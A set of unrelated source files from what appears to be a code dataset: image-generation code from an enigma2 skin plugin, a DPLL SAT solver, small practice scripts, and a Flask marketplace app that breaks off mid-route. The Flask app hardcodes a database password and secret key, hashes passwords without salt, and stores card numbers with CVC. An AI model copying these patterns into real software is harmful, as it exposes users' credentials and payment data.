70, config.plugins.KravenHD.SelectionBackground.value, config.plugins.KravenHD.SelectionBackground2.value, \"00\")\n\t\tself.makeGradientpng(\"sel_75\", 736, 75, config.plugins.KravenHD.SelectionBackground.value, config.plugins.KravenHD.SelectionBackground2.value, \"00\")\n\t\tself.makeGradientpng(\"sel_90\", 870, 90, config.plugins.KravenHD.SelectionBackground.value, config.plugins.KravenHD.SelectionBackground2.value, \"00\")\n\t\tself.makeGradientpng(\"sel_110\", 736, 110, config.plugins.KravenHD.SelectionBackground.value, config.plugins.KravenHD.SelectionBackground2.value, \"00\")\n\t\tself.makeGradientpng(\"sel_135\", 736, 136, config.plugins.KravenHD.SelectionBackground.value, config.plugins.KravenHD.SelectionBackground2.value, \"00\")\n\t\tself.makeGradientpng(\"sel_CS\", 765, self.actCSItemHeight, config.plugins.KravenHD.SelectionBackground.value, config.plugins.KravenHD.SelectionBackground2.value, \"00\")\n\t\tif config.plugins.KravenHD.EMCSelectionColors.value == \"global\":\n\t\t\tif config.plugins.KravenHD.EMCStyle.value in (\"emc-verybigcover\", \"emc-verybigcover2\"):\n\t\t\t\tself.makeGradientpng(\"sel_28\", 777, 28, config.plugins.KravenHD.SelectionBackground.value, config.plugins.KravenHD.SelectionBackground2.value, \"00\")\n\t\t\telse:\n\t\t\t\tself.makeGradientpng(\"sel_32\", 1196, 32, config.plugins.KravenHD.SelectionBackground.value, config.plugins.KravenHD.SelectionBackground2.value, \"00\")\n\n\tdef makeGradientpng(self, name, width, height, color1, color2, trans):\n\t\twidth = int(width * self.factor)\n\t\theight = int(height * self.factor)\n\t\ttrans = 255 - int(trans, 16)\n\n\t\tcolor1 = color1[-6:]\n\t\tr1 = int(color1[0:2], 16)\n\t\tg1 = int(color1[2:4], 16)\n\t\tb1 = int(color1[4:6], 16)\n\t\tcolor2 = color2[-6:]\n\t\tr2 = int(color2[0:2], 16)\n\t\tg2 = int(color2[2:4], 16)\n\t\tb2 = int(color2[4:6], 16)\n\n\t\tgradient = Image.new(\"RGBA\", (1, height), (r2, g2, b2, trans))\n\t\tfor pos in range(0, height):\n\t\t\tp = pos / float(height)\n\t\t\tr = r2 * p + r1 * (1 - p)\n\t\t\tg = g2 * p + g1 * (1 - p)\n\t\t\tb = b2 * p + b1 * (1 - p)\n\t\t\tgradient.putpixel((0, pos), (int(r), int(g), int(b), int(trans)))\n\t\tgradient = gradient.resize((width, height))\n\t\tgradient.save(self.graphics + name + \".png\")\n\n\tdef makeBGTexturepng(self):\n\t\tself.makeTexturepng(\"globalbg\", 1280, 720, config.plugins.KravenHD.BackgroundTexture.value, config.plugins.KravenHD.BackgroundColorTrans.value)\n\t\tself.makeTexturepng(\"nontransbg\", 1280, 720, config.plugins.KravenHD.BackgroundTexture.value, \"00\")\n\t\tself.makeTexturepng(\"channelbg\", 1280, 720, config.plugins.KravenHD.BackgroundTexture.value, config.plugins.KravenHD.ChannelSelectionTrans.value)\n\n\tdef makeIBTexturepng(self):\n\t\tself.makeTexturepng(\"ibtexture\", 1280, 720, config.plugins.KravenHD.InfobarTexture.value, config.plugins.KravenHD.InfobarColorTrans.value)\n\n\tdef makeTexturepng(self, name, width, height, style, trans):\n\t\twidth = int(width * self.factor)\n\t\theight = int(height * self.factor)\n\t\ttrans = 255 - int(trans, 16)\n\n\t\tpath = \"/usr/share/enigma2/KravenHD/textures/\"\n\t\tusrpath = \"/usr/share/enigma2/Kraven-user-icons/\"\n\n\t\tif fileExists(usrpath + style + \".png\"):\n\t\t\tbg = Image.open(usrpath + style + \".png\")\n\t\telif fileExists(usrpath + style + \".jpg\"):\n\t\t\tbg = Image.open(usrpath + style + \".jpg\")\n\t\telif fileExists(path + style + \".png\"):\n\t\t\tbg = Image.open(path + style + \".png\")\n\t\telif fileExists(path + style + \".jpg\"):\n\t\t\tbg = 
Image.open(path + style + \".jpg\")\n\t\tbg_w, bg_h = bg.size\n\t\timage = Image.new(\"RGBA\", (width, height), (0, 0, 0, 0))\n\t\tfor i in range(0, width, bg_w):\n\t\t\tfor j in range(0, height, bg_h):\n\t\t\t\timage.paste(bg, (i, j))\n\t\talpha = Image.new(\"L\", (width, height), trans)\n\t\timage.putalpha(alpha)\n\t\timage.save(self.graphics + name + \".png\")\n\n\tdef makebsWindowpng(self):\n\t\taddition = \"\"\n\t\tborder = None\n\t\tif config.plugins.KravenHD.PopupStyle.value == \"popup-grad-trans\":\n\t\t\taddition = \"_gr_tr\"\n\t\t\tborder = None\n\t\telif config.plugins.KravenHD.PopupStyle.value == \"popup-grad\":\n\t\t\taddition = \"_gr\"\n\t\t\tborder = None\n\t\telif config.plugins.KravenHD.PopupStyle.value == \"popup-box-trans\":\n\t\t\taddition = \"_bx_tr\"\n\t\t\tborder = config.plugins.KravenHD.Border.value\n\t\telif config.plugins.KravenHD.PopupStyle.value == \"popup-box\":\n\t\t\taddition = \"_bx\"\n\t\t\tborder = config.plugins.KravenHD.Border.value\n\n\t\tself.changeColor(\"bs_b\" + addition, \"bs_b\", self.skincolorbackgroundcolor, border)\n\t\tself.changeColor(\"bs_bl\" + addition, \"bs_bl\", self.skincolorbackgroundcolor, border)\n\t\tself.changeColor(\"bs_br\" + addition, \"bs_br\", self.skincolorbackgroundcolor, border)\n\t\tself.changeColor(\"bs_l\" + addition, \"bs_l\", self.skincolorbackgroundcolor, border)\n\t\tself.changeColor(\"bs_r\" + addition, \"bs_r\", self.skincolorbackgroundcolor, border)\n\t\tself.changeColor(\"bs_t\" + addition, \"bs_t\", self.skincolorbackgroundcolor, border)\n\t\tself.changeColor(\"bs_tl\" + addition, \"bs_tl\", self.skincolorbackgroundcolor, border)\n\t\tself.changeColor(\"bs_tr\" + addition, \"bs_tr\", self.skincolorbackgroundcolor, border)\n\n\tdef makeHorMenupng(self, color1, color2):\n\t\twidth = int(192 * self.factor)\n\t\theight = int(92 * self.factor)\n\t\tradius = int(10 * self.factor)\n\t\tgradientsize = int(24 * self.factor)\n\t\ttrans = 230\n\n\t\tcolor1 = color1[-6:]\n\t\tr1 = int(color1[0:2], 16)\n\t\tg1 = int(color1[2:4], 16)\n\t\tb1 = int(color1[4:6], 16)\n\t\tcolor2 = color2[-6:]\n\t\tr2 = int(color2[0:2], 16)\n\t\tg2 = int(color2[2:4], 16)\n\t\tb2 = int(color2[4:6], 16)\n\n\t\tmask = Image.new(\"L\", (width, height), trans)\n\t\tcorner = Image.new('L', (radius, radius), 0)\n\t\tdraw = ImageDraw.Draw(corner)\n\t\tdraw.pieslice((0, 0, radius * 2, radius * 2), 180, 270, trans)\n\t\tmask.paste(corner, (0, 0))\n\t\tmask.paste(corner.transpose(Image.FLIP_LEFT_RIGHT), (width - radius, 0))\n\t\tmask.paste(corner.transpose(Image.ROTATE_180), (width - radius, height - radius))\n\t\tmask.paste(corner.transpose(Image.FLIP_TOP_BOTTOM), (0, height - radius))\n\n\t\tgradient = Image.new(\"RGBA\", (1, height / 2), (r2, g2, b2, trans))\n\t\tfor pos in range(0, gradientsize):\n\t\t\tp = pos / float(gradientsize)\n\t\t\tr = r2 * p + r1 * (1 - p)\n\t\t\tg = g2 * p + g1 * (1 - p)\n\t\t\tb = b2 * p + b1 * (1 - p)\n\t\t\tgradient.putpixel((0, pos), (int(r), int(g), int(b), trans))\n\t\tgradient = gradient.resize((width, height / 2))\n\n\t\timg = Image.new('RGBA', (width, height), (0, 0, 0, 0))\n\t\timg.paste(gradient, (0, 0))\n\t\timg.paste(gradient.transpose(Image.FLIP_TOP_BOTTOM), (0, height / 2))\n\t\timg.putalpha(mask)\n\t\timg.save(\"/usr/share/enigma2/KravenHD/buttons/icon1.png\")\n\n\tdef makeProgressBackground(self, width, color, output):\n\t\theight = int(21 * self.factor)\n\t\twidth = int(width * self.factor)\n\n\t\tcolor = color[-6:]\n\t\tr1 = int(color[0:2], 16)\n\t\tg1 = int(color[2:4], 16)\n\t\tb1 = int(color[4:6], 
16)\n\n\t\timg = Image.open(self.templates + \"progress_bg_m.png\")\n\t\timg = img.resize((width, height))\n\t\tside = Image.open(self.templates + \"progress_bg_s.png\")\n\t\timg.paste(side, (0, 0))\n\t\timg.paste(side.transpose(Image.FLIP_LEFT_RIGHT), (width - int(10 * self.factor), 0))\n\n\t\tpixels = img.load()\n\t\tfor x in range(width):\n\t\t\tfor y in range(height):\n\t\t\t\tr, g, b, a = pixels[x, y]\n\t\t\t\tif (r, g, b) == (0, 0, 0):\n\t\t\t\t\tpixels[x, y] = (r1, g1, b1, a)\n\t\timg.save(self.graphics + output + \".png\")\n\n\tdef changeColor(self, input, output, color1, color2):\n\t\timg = Image.open(self.templates + input + \".png\")\n\n\t\tcolor1 = color1[-6:]\n\t\tr1 = int(color1[0:2], 16)\n\t\tg1 = int(color1[2:4], 16)\n\t\tb1 = int(color1[4:6], 16)\n\n\t\tpixels = img.load()\n\t\tfor x in range(img.size[0]):\n\t\t\tfor y in range(img.size[1]):\n\t\t\t\tr, g, b, a = pixels[x, y]\n\t\t\t\tif (r, g, b) == (0, 0, 0):\n\t\t\t\t\tpixels[x, y] = (r1, g1, b1, a)\n\t\t\t\tif color2 is not None:\n\t\t\t\t\tcolor2 = color2[-6:]\n\t\t\t\t\tr2 = int(color2[0:2], 16)\n\t\t\t\t\tg2 = int(color2[2:4], 16)\n\t\t\t\t\tb2 = int(color2[4:6], 16)\n\t\t\t\t\tif (r, g, b) == (254, 254, 254):\n\t\t\t\t\t\tpixels[x, y] = (r2, g2, b2, a)\n\t\timg.save(self.graphics + output + \".png\")\n\n\tdef makeborsetpng(self, color):\n\t\tcolor = color[-6:]\n\t\tr = int(color[0:2], 16)\n\t\tg = int(color[2:4], 16)\n\t\tb = int(color[4:6], 16)\n\n\t\timg = Image.new(\"RGBA\", (2, 2), (r, g, b, 255))\n\t\timg.save(self.graphics + \"borset.png\")\n\n\tdef dexpGradient(self, len, spd, pos):\n\t\tif pos < 0:\n\t\t\tpos = 0\n\t\tif pos > len-1:\n\t\t\tpos = len-1\n\t\ta = ((len/2)**spd)*2.0\n\t\tif pos <= len/2:\n\t\t\tf = (pos**spd)\n\t\telse:\n\t\t\tf = a-((len-pos)**spd)\n\t\te = int((f/a)*255)\n\t\treturn e\n\n\tdef calcBrightness(self, color, factor):\n\t\tf = int(int(factor)*25.5-255)\n\t\tcolor = color[-6:]\n\t\tr = int(color[0:2], 16)+f\n\t\tg = int(color[2:4], 16)+f\n\t\tb = int(color[4:6], 16)+f\n\t\tif r<0:\n\t\t\tr=0\n\t\tif g<0:\n\t\t\tg=0\n\t\tif b<0:\n\t\t\tb=0\n\t\tif r>255:\n\t\t\tr=255\n\t\tif g>255:\n\t\t\tg=255\n\t\tif b>255:\n\t\t\tb=255\n\t\treturn str(hex(r)[2:4]).zfill(2)+str(hex(g)[2:4]).zfill(2)+str(hex(b)[2:4]).zfill(2)\n\n\tdef calcTransparency(self, trans1, trans2):\n\t\tt1 = int(trans1, 16)\n\t\tt2 = int(trans2, 16)\n\t\treturn str(hex(min(t1, t2))[2:4]).zfill(2)\n\n\tdef hexRGB(self, color):\n\t\tcolor = color[-6:]\n\t\tr = int(color[0:2], 16)\n\t\tg = int(color[2:4], 16)\n\t\tb = int(color[4:6], 16)\n\t\treturn (r<<16)|(g<<8)|b\n\n\tdef RGB(self, r, g, b):\n\t\treturn (r<<16)|(g<<8)|b\n","repo_name":"oerlgrey/KravenHD","sub_path":"usr/lib/enigma2/python/Plugins/Extensions/KravenHD/KravenHD.py","file_name":"KravenHD.py","file_ext":"py","file_size_in_byte":302419,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"1531396300","text":"from boolean_utilities import *\nimport time\nfrom random import randint\nimport os\n\n\ndef log(fonction):\n def logging(*args, **kwargs):\n str2 = fonction.__name__.replace('_', ' ').title()\n timeBefore = time.time()\n ret = fonction(*args, **kwargs)\n timeAfter = time.time()\n execTime = timeAfter - timeBefore\n if execTime < 0.001:\n timeStr = \"{:.3f}\".format(execTime * 1000) + \" ms ]\"\n else:\n timeStr = \"{:.3f}\".format(execTime) + \" s ]\"\n logLine = \"(\" + os.environ[\"USER\"] + \")Running: \" + \\\n \"{: <17}\".format(str2) + \"[ exec-time = \" + timeStr\n # print(logLine)\n with 
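dexpGradient above is a symmetric ease-in/ease-out ramp: f grows like pos**spd over the first half of the run and mirrors over the second, scaled to 0..255. A quick standalone check of the curve shape, with the same arithmetic copied out of the class (dexp_gradient and the sample arguments are illustrative):

def dexp_gradient(length, spd, pos):
    # same math as dexpGradient above, outside the class
    pos = min(max(pos, 0), length - 1)
    a = ((length / 2) ** spd) * 2.0
    f = pos ** spd if pos <= length / 2 else a - (length - pos) ** spd
    return int((f / a) * 255)

print([dexp_gradient(8, 2.0, p) for p in range(8)])
# -> [0, 7, 31, 71, 127, 183, 223, 247]: slow start, fast middle, slow end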
open(\"machine.log\", \"a\") as logger:\n            logger.write(logLine + \"\\n\")\n        return ret\n    return logging\n\n\n@log\ndef SATTruthtable(formula: str, verbose=False) -> bool:\n    variables = find_number_variable(formula)\n    n = len(variables)\n    table = list(itertools.product([0, 1], repeat=n))\n    for rank in table:\n        changedFormula = formula\n        for i in range(n):\n            changedFormula = changedFormula.replace(variables[i], str(rank[i]))\n        result = eval_formula(changedFormula)\n        if result is True:\n            if verbose is True:\n                for i, variable in enumerate(variables):\n                    print(\"{}: {} \".format(variable, bool(rank[i])), end=\" \")\n                print()\n            return True\n        if result is None:\n            return errorMessage()\n    return False\n\n\nclass SATInstance:\n    \"\"\"\n    A class for each formula\n    \"\"\"\n    def __init__(self):\n        self.variables = [] # the list of variables\n        self.variablesTable = {} # dictionary of variable-value pairs\n        self.clauses = [] # the list of clauses, with their values\n        self.F = [] # the list of clauses that will be modified\n\n    def parseAndAddClauses(self, formula: str) -> None:\n        \"\"\"\n        Parse the formula and separate the different clauses\n        Each variable of the dictionary is value * 2,\n        or value * 2 + 1 if the variable is with !\n        \"\"\"\n        negated = 0\n        formule = formula[::-1]\n        nbOfClauses = 1\n        nbOflit = 1\n        i = 0\n        clause = []\n        while formule[i] == \"&\":\n            nbOfClauses += 1\n            i += 1\n        while i < len(formule):\n            if formule[i] == \"|\":\n                nbOflit += 1\n            elif formule[i] == \"!\":\n                negated = 1\n            else:\n                variable = formule[i]\n                if variable not in self.variablesTable:\n                    self.variablesTable[variable] = len(self.variables)\n                    self.variables.append(variable)\n                encodedLit = self.variablesTable[variable] << 1 | negated\n                clause.append(encodedLit)\n                nbOflit = nbOflit - 1\n                negated = 0\n                if nbOflit == 0:\n                    self.clauses.append(list(set(clause)))\n                    nbOflit = 1\n                    clause = []\n            i += 1\n        if len(self.clauses) != nbOfClauses: # just a sanity check\n            print(\"Ohoh, we made a mistake\")\n        self.F = self.clauses.copy()\n\n    def literalToString(self, literal: int) -> str:\n        \"\"\"\n        Recover the string from numerical variable\n        \"\"\"\n        s = '!' 
if literal & 1 else ''\n        return self.variables[literal >> 1] + s\n\n    def clauseToString(self, clause: list) -> str:\n        \"\"\"\n        Recover the expression of a clause\n        \"\"\"\n        return \" \".join(self.literalToString(lit) for lit in clause)\n\n    def propagateUnits(self, F: list) -> list:\n        \"\"\"\n        for each unit clause {+/-x} in F\n        remove all non-unit clauses containing + /-x\n        remove all instances of - /+x in every clause // flipped sign!\n        \"\"\"\n        unitList = []\n        for clause in F:\n            if len(clause) == 0:\n                return [[]]\n            if len(clause) == 1:\n                unitList.append(clause[0])\n        for nb in unitList:\n            if nb ^ 1 in unitList: # the negation\n                return [[]]\n            for clause in F:\n                if nb in clause and len(clause) != 1:\n                    F.remove(clause)\n                if nb ^ 1 in clause:\n                    clause.remove(nb ^ 1)\n        return F\n\n    def pureElimination(self, F: list) -> list:\n        \"\"\"\n        for each variable x\n        if +/-x is pure in F\n        remove all clauses containing + /-x\n        add a unit clause {+/-x}\n        \"\"\"\n        lst = []\n        for clause in F:\n            lst += clause\n        uniques = set(lst)\n        # print(uniques)\n        for val in uniques:\n            if val ^ 1 not in uniques: # means val is pure\n                # print(val)\n                for clause in F:\n                    if val in clause:\n                        F.remove(clause)\n                F.append([val])\n        return F\n\n    def addEliminatedVariables(self, F: list) -> list:\n        \"\"\"\n        create a unit clause for eliminated variables during procedure\n        \"\"\"\n        f = []\n        for clause in F:\n            f += clause\n        f = set(f)\n        for value in self.variablesTable.values():\n            a = value << 1\n            b = value << 1 | 1\n            if a not in f and b not in f:\n                F.append([value << 1])\n        return F\n\n    def solve(self, F) -> list:\n        \"\"\"\n        recursive DPLL algorithm\n        \"\"\"\n        F = self.propagateUnits(F)\n        F = self.pureElimination(F)\n        F = self.addEliminatedVariables(F)\n        valueSet = set()\n        for clause in F:\n            if len(clause) == 0:\n                return [[]]\n            if len(clause) == 1:\n                valueSet.add(clause[0])\n        for n in valueSet:\n            if n ^ 1 in valueSet:\n                return [[]]\n        if len(valueSet) == len(self.variables):\n            return F\n        x = -1\n        for clause in F:\n            if len(clause) > 1:\n                x = clause[0]\n        a = self.solve(F + [[x]])\n        if a != [[]]:\n            return a\n        else:\n            return self.solve(F + [[x ^ 1]])\n\n\n@log\ndef sat(formula: str, verbose=False) -> bool:\n    \"\"\"\n    DPLL sat solver, option verbose gives a solution if True\n    \"\"\"\n    cnfFormula = conjunctive_normal_form(formula)\n    s = SATInstance()\n    s.parseAndAddClauses(cnfFormula)\n    F = s.clauses.copy()\n    F = s.solve(F)\n    if F == [[]]:\n        return False\n    if verbose is True:\n        values = []\n        for clause in F:\n            values += clause\n        val = set(values)\n        for item in s.variablesTable.items():\n            if item[1] << 1 in val:\n                print(\"{}: True,\".format(item[0]), end=\" \")\n            elif item[1] << 1 | 1 in val:\n                print(\"{}: False,\".format(item[0]), end=\" \")\n            else:\n                print(\"something went wrong\")\n        print()\n    return True\n\n\ndef main():\n    print(\"AB|\")\n    print(SATTruthtable(\"AB|\", True))\n    print(sat(\"AB|\", True))\n    print()\n\n    print(\"AB&\")\n    print(SATTruthtable(\"AB&\", True))\n    print(sat(\"AB&\", True))\n    print()\n\n    print(\"AA!&\")\n    print(SATTruthtable(\"AA!&\", True))\n    print(sat(\"AA!&\", True))\n    print()\n\n    print(\"AA^\")\n    print(SATTruthtable(\"AA^\", True))\n    print(sat(\"AA^\", True))\n    print()\n\n    print(\"D!F|D!E!G||H!J|H!I|I!A|G!I!B||A!C|B!C!|&&&&&&&\")\n    print(SATTruthtable(\"D!F|D!E!G||H!J|H!I|I!A|G!I!B||A!C|B!C!|&&&&&&&\",\n                        True))\n    print(sat(\"D!F|D!E!G||H!J|H!I|I!A|G!I!B||A!C|B!C!|&&&&&&&\", True))\n    print()\n\n    
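SATInstance above packs each literal into a single integer: the variable index shifted left one bit, with the low bit marking negation. That makes `lit ^ 1` flip a literal's sign and `lit >> 1` recover its variable, which is exactly how propagateUnits detects contradictions. A tiny illustration (encode and negate are made-up helper names):

def encode(var_index, negated):
    return var_index << 1 | negated

def negate(lit):
    return lit ^ 1  # flips only the sign bit

assert encode(0, 0) == 0                # first variable, positive
assert encode(0, 1) == 1                # first variable, negated
assert negate(encode(2, 0)) == 5        # third variable, sign flipped
assert negate(encode(2, 0)) >> 1 == 2   # back to the variable index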
print(\"ABCDEFGHIJK!LMNOP&&&&&&&&&&&&&&&\")\n    print(SATTruthtable(\"ABCDEFGHIJK!LMNOP&&&&&&&&&&&&&&&\", True))\n    print(sat(\"ABCDEFGHIJK!LMNOP&&&&&&&&&&&&&&&\", True))\n    print()\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"stelon77/42_AI_Branch","sub_path":"ReadySetBoole/ex07/sat.py","file_name":"sat.py","file_ext":"py","file_size_in_byte":7962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"72101368107","text":"from typing import List\n\ndef removeDuplicates(nums: List[int]) -> int:\n    nums[:] = sorted(set(nums))\n    print(nums)\n    return len(nums)\n\n\nfirst_example = [0, 1, 1, 2, 2, 3, 3]\n\nprint(removeDuplicates(first_example))","repo_name":"davidyoon891122/LeetCode","sub_path":"RemoveDuplicateInSortedList/remove_duplicate_set.py","file_name":"remove_duplicate_set.py","file_ext":"py","file_size_in_byte":219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"11445872877","text":"#enter a 4-digit number, and it says how many of its digits are even\nx=input() \n\nx_str=str(x)\n\nx1=x_str[0]\nx2=x_str[1]\nx3=x_str[2]\nx4=x_str[3]\n\nx1int= int(x1)\nx2int= int(x2)\nx3int= int(x3)\nx4int= int(x4)\n\n\nx_1=x1int % 2\nx_2=x2int % 2\nx_3=x3int % 2\nx_4=x4int % 2\n\nif x_1 == 0:\n    y_1='Even'\n    z_1=x1int\nelse:\n    y_1='no'\n    z_1=0\nif x_2 == 0: \n    y_2='Even'\n    z_2=x2int\nelse:\n    y_2='no'\n    z_2=0\nif x_3 == 0: \n    y_3='Even'\n    z_3=x3int\nelse:\n    y_3='no'\n    z_3=0\nif x_4 == 0: \n    y_4='Even'\n    z_4=x4int\nelse:\n    y_4='no'\n    z_4=0\n\nz= z_1+z_2+z_3+z_4\n\ny=y_1+y_2+y_3+y_4\n\nif y.count('Even') == 4:\n    print('All are even')\nif y.count('Even') == 3:\n    print('3 are even')\nif y.count('Even') == 2:\n    print('2 are even')\nif y.count('Even') == 1:\n    print('1 is even')\nif y.count('Even') == 0:\n    print('All are odd')\n\nprint('The sum of the even numbers is:',z)","repo_name":"AndresBarr/Mintic","sub_path":"ejer17.py","file_name":"ejer17.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"40957330251","text":"from flask import Flask, make_response\nfrom markupsafe import escape\nfrom flask import render_template\nfrom flask import request\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask import url_for\nfrom flask import redirect\nfrom flask_login import (current_user, LoginManager,\n                         login_user, logout_user,\n                         login_required)\nfrom datetime import datetime\nimport hashlib\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'mysql://testuser:toledo22@localhost:3306/Offer'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\ndb = SQLAlchemy(app)\n\napp.secret_key = 'HelloWorld'\nlogin_manager = LoginManager()\nlogin_manager.init_app(app)\nlogin_manager.login_view = 'login'\n\nclass Usuario(db.Model):\n    __tablename__ = \"usuario\"\n    id = db.Column ('usu_id', db.Integer, primary_key=True)\n    username = db.Column('username', db.String(45))\n    nome = db.Column ('nome', db.String(100))\n    email = db.Column ('email', db.String(100))\n    senha = db.Column ('senha', db.String(256))\n    telefone = db.Column ('telefone', db.String(20))\n    rua = db.Column ('rua', db.String(150))\n    numero = db.Column ('numero', db.String(10))\n    bairro = db.Column ('bairro', db.String(45))\n    cidade = db.Column ('cidade', db.String(45))\n    estado = db.Column ('estado', db.String(45))\n    cep = db.Column ('cep', db.String(10))\n\n    favoritos = db.relationship(\"Favorito\", 
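In the remove_duplicate_set.py record above, `nums[:] = sorted(set(nums))` relies on slice assignment: it rewrites the existing list object in place, so every alias of the list sees the deduplicated result, whereas `nums = sorted(set(nums))` would only rebind the local name. A two-line demonstration:

nums = [0, 1, 1, 2, 2, 3, 3]
alias = nums
nums[:] = sorted(set(nums))    # mutates the shared list object in place
assert alias == [0, 1, 2, 3]   # the alias observes the change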
back_populates=\"usuario\")\n\n def __init__(self, username, nome, email, senha, telefone, rua, numero, bairro, cidade, estado, cep):\n self.username = username\n self.nome = nome\n self.email = email\n self.senha = senha\n self.telefone = telefone\n self.rua = rua\n self.numero = numero\n self.bairro = bairro\n self.cidade = cidade\n self.estado = estado\n self.cep = cep\n\n def is_authenticated(self):\n return True\n\n def is_active(self):\n return True\n\n def is_anonymous(self):\n return False\n\n def get_id(self):\n return str(self.id)\n\nclass Cartao(db.Model):\n __tablename__ = \"cartao\"\n id = db.Column ('cartao_id', db.Integer, primary_key=True)\n num_cartao = db.Column('num_cartao', db.String(20))\n nome_cartao = db.Column ('_nome_cartao', db.String(45))\n month = db.Column ('month', db.String(2))\n year = db.Column ('year', db.String(4))\n cvc = db.Column ('cvc', db.String(3))\n usuario_id = db.Column('usu_id', db.Integer, db.ForeignKey(\"usuario.usu_id\"))\n\n def __init__(self, num_cartao, nome_cartao, month, year, cvc, usuario_id):\n self.num_cartao = num_cartao\n self.nome_cartao = nome_cartao\n self.month = month\n self.year = year\n self.cvc = cvc\n self.usuario_id = usuario_id\n\nclass Categoria(db.Model):\n __tablename__ = \"categoria\"\n id = db.Column('cat_id', db.Integer, primary_key=True)\n nome = db.Column('cat_nome', db.String(150))\n desc = db.Column('cat_desc', db.String(150))\n\n produto = db.relationship(\"Produto\", back_populates=\"categoria\")\n\n def __init__ (self, nome, desc):\n self.nome = nome\n self.desc = desc\n\nclass Produto(db.Model):\n __tablename__ = \"produto\"\n id = db.Column('anu_id', db.Integer, primary_key=True)\n prod_nome = db.Column('prod_nome', db.String(45))\n prod_desc = db.Column('prod_desc', db.String(250))\n prod_espec = db.Column('prod_espec', db.String(250))\n prod_marca = db.Column('prod_marca', db.String(45))\n prod_modelo = db.Column('prod_modelo', db.String(45))\n prod_qtd = db.Column('prod_qtd', db.String(45))\n prod_preco = db.Column('prod_preco', db.String(45))\n cat_id = db.Column('cat_id', db.Integer, db.ForeignKey(\"categoria.cat_id\"))\n usu_id = db.Column('usu_id', db.Integer, db.ForeignKey(\"usuario.usu_id\"))\n\n favoritos = db.relationship(\"Favorito\", back_populates=\"produto\")\n categoria = db.relationship('Categoria', foreign_keys=[cat_id], backref=db.backref('produtos', lazy=True))\n usuario = db.relationship('Usuario', foreign_keys=[usu_id], backref=db.backref('produtos', lazy=True))\n\n\n def __init__(self, prod_nome, prod_desc, prod_espec, prod_marca, prod_modelo, prod_qtd, prod_preco, cat_id, usu_id):\n self.prod_nome = prod_nome\n self.prod_desc = prod_desc\n self.prod_espec = prod_espec\n self.prod_marca = prod_marca\n self.prod_modelo = prod_modelo\n self.prod_qtd = prod_qtd\n self.prod_preco = prod_preco\n self.cat_id = cat_id\n self.usu_id = usu_id\n\nclass Favorito(db.Model):\n __tablename__ = \"favorito\"\n id = db.Column('fav_id', db.Integer, primary_key=True)\n usuario_id = db.Column('usu_id', db.Integer, db.ForeignKey(\"usuario.usu_id\"))\n produto_id = db.Column('anu_id', db.Integer, db.ForeignKey(\"produto.anu_id\"))\n\n usuario = db.relationship(\"Usuario\", back_populates=\"favoritos\")\n produto = db.relationship(\"Produto\", back_populates=\"favoritos\")\n\n def __init__(self, usuario_id, produto_id):\n self.usuario_id = usuario_id\n self.produto_id = produto_id\n\nclass Compra(db.Model):\n __tablename__ = \"compra\"\n id = db.Column('compra_id', db.Integer, primary_key=True)\n produto_id 
= db.Column('anu_id', db.Integer, db.ForeignKey(\"produto.anu_id\"))\n vendedor_id = db.Column('vendedor_id', db.Integer, db.ForeignKey(\"usuario.usu_id\"))\n comprador_id = db.Column('comprador_id', db.Integer, db.ForeignKey(\"usuario.usu_id\"))\n cartao_id = db.Column('cartao_id', db.Integer, db.ForeignKey(\"cartao.cartao_id\"))\n quantidade = db.Column('quantidade', db.Integer)\n data_hora = db.Column('data_hora', db.DateTime)\n\n produto = db.relationship(\"Produto\")\n vendedor = db.relationship(\"Usuario\", foreign_keys=[vendedor_id])\n comprador = db.relationship(\"Usuario\", foreign_keys=[comprador_id])\n cartao = db.relationship(\"Cartao\")\n\n def __init__(self, produto_id, vendedor_id, comprador_id, cartao_id, quantidade):\n self.produto_id = produto_id\n self.vendedor_id = vendedor_id\n self.comprador_id = comprador_id\n self.cartao_id = cartao_id\n self.quantidade = quantidade\n self.data_hora = datetime.now()\n\nclass Pergunta(db.Model):\n __tablename__ = \"pergunta\"\n id = db.Column('pergunta_id', db.Integer, primary_key=True)\n produto_id = db.Column('produto_id', db.Integer, db.ForeignKey(\"produto.anu_id\"))\n texto = db.Column('texto', db.String(500))\n \n resposta = db.relationship(\"Resposta\", uselist=False, back_populates=\"pergunta\")\n\n def __init__(self, produto_id, texto):\n self.produto_id = produto_id\n self.texto = texto\n\nclass Resposta(db.Model):\n __tablename__ = \"resposta\"\n id = db.Column('resposta_id', db.Integer, primary_key=True)\n pergunta_id = db.Column('pergunta_id', db.Integer, db.ForeignKey(\"pergunta.pergunta_id\"))\n texto = db.Column('texto', db.String(500))\n\n pergunta = db.relationship(\"Pergunta\", back_populates=\"resposta\")\n\n def __init__(self, pergunta_id, texto):\n self.pergunta_id = pergunta_id\n self.texto = texto\n\n@app.errorhandler(404)\ndef pagnaoencontrada(error):\n return render_template('pagnaoencontrada.html')\n\n@login_manager.user_loader\ndef load_user(id):\n return Usuario.query.get(id)\n\n@app.route(\"/login\", methods=['GET','POST'])\ndef login():\n if request.method == 'POST':\n email = request.form.get('email')\n passwd = hashlib.sha512(str(request.form.get('passwd')).encode(\"utf-8\")).hexdigest()\n user = Usuario.query.filter_by(email=email, senha=passwd).first()\n\n if user:\n login_user(user)\n return redirect(url_for('central'))\n else:\n return redirect(url_for('login'))\n return render_template('login.html')\n\n@app.route(\"/logout\")\ndef logout():\n logout_user()\n return redirect(url_for('home'))\n\n@app.route(\"/\")\ndef home():\n return render_template('home.html')\n\n@app.route(\"/central\")\n@login_required\ndef central():\n return render_template('central_usuario.html', titulo=\"Minha Conta\")\n\n@app.route(\"/usuario\")\ndef usuario():\n return render_template('usuario.html', usuarios = Usuario.query.all(), titulo=\"Usuário\")\n\n@app.route(\"/usuario/gerenciar\")\n@login_required\ndef gerenciaruser(): \n usuario = current_user\n return render_template('gerenciaruser.html', usuario=usuario, titulo=\"Usuário\")\n\n@app.route(\"/usuario/criar\", 